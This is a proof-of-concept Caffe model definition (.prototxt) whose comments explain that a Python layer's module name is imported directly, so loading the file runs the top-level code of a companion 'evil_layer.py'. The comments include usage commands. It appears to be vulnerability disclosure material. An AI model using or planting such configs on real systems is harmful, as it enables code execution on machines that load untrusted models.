# PoC: Caffe PythonLayer Arbitrary Code Execution
# ================================================
# Loading this .prototxt with a Caffe build that has WITH_PYTHON_LAYER=1
# triggers arbitrary Python code execution via module import.
#
# Vulnerability: layer_factory.cpp:295
#   bp::import(param.python_param().module().c_str())
#
# The "module" field specifies a Python module name that gets imported
# via boost::python. The import mechanism executes all top-level code
# in the module, giving the attacker arbitrary code execution.
#
# Usage:
#   cd /path/to/this/directory   # so Python finds evil_layer.py
#   caffe test -model poc_rce.prototxt -iterations 1 2>/dev/null
#   cat /tmp/caffe_rce_proof.txt  # verify RCE
#
# Or from Python:
#   import caffe
#   net = caffe.Net('poc_rce.prototxt', caffe.TEST)

name: "PoCExploitNet"

layer {
  name: "data"
  type: "DummyData"
  top: "data"
  dummy_data_param {
    shape { dim: 1 dim: 1 dim: 1 dim: 1 }
  }
}

layer {
  name: "exploit"
  type: "Python"
  bottom: "data"
  top: "output"
  python_param {
    # This module name is passed directly to bp::import()
    # Python's import mechanism executes top-level code in the module
    module: "evil_layer"
    layer: "ExploitLayer"
  }
}